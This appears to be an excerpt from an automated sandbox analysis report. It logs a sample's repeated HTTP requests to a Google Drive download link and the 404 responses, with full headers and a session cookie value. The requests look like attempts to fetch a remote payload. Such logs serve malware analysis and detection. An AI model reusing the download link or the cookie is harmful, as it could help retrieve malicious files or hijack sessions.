      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
      Source: global trafficDNS traffic detected: DNS query: drive.google.com
      Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRRBVsFxWTiDXRQfidilVLR7Ia_EU_qZLAq0WddOUff271D59_toVqXUgkjvGuP1NvW-SLU7kMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:13:10 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-XNdeAJo4p6EC-YET1IzUqg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd; expires=Sun, 13-Jul-2025 04:13:10 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=noneAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRYzgcgZ9Wbmh56G03AjHcbsBtLw5tB8qfvxusdV58TJjo670Z-NCTllD9fVsmaV0t7aeLhmh4Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:13:22 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-RvEYxCsBG6gYbcFQNKwrrQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSAPf1LDa9mbRyVt3wFxVi_mf2ZhK4G77OC45KZGIFsfiCRYyQNUYjg44JKg5LjP0y2352r9KsContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:13:34 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-Irh2BwOx6FeYaELw0I71-g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC74Z7wj3dNfFJ2ww21Cok96tTb__X6y5tNVWEkDR6_VkkLawFs1lf9WDObcyb5J8ubTContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:13:46 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-Qsd--4vV_Jhh6LUxnWo32w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQRM5utXp5ejsPbRyIKVp5p5DZITeKIORxY-a4aKBmZfiC3lPcvGxNHGufnAU2v8ZAiquIf5rkContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:13:59 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-WXRINWntd-QKU3LV0NQD1g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQepwL3X8bSe-R9rdKhZRT_MAfxTRznKm_KaczQJNbkuQGNzP4KwDRR-A6Tlq-77eRQPgNfrqYContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:14:11 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-CgtWUXN1hCu2CjyUOZkq3w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQ7u5BAW8jRP-miQYp0-QWtnpzvShLwc52rxHINiWbMhJcQu4lmchCp9wgbQvw0uVraContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:14:23 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-EW-iSWlwlNDYnMbHYaBvQw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRlD7hFYyBuizeg1e5mSmbLEPPNpdWTk3Zg2emGlH_mIk3_0ZZmeekOyUDv3jy0HTRxContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:14:35 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-hrIgp9iCnLYobQ1jA1kzoA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSnY6MHVQZHWiVUxGsXY2lK-pXKUqzAIOHDDJSm2CFsqzvb19yD943GHOpNh63vf21_9XC72owContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:14:47 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-zKVdffCKg-qiUCMhY6inUw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com 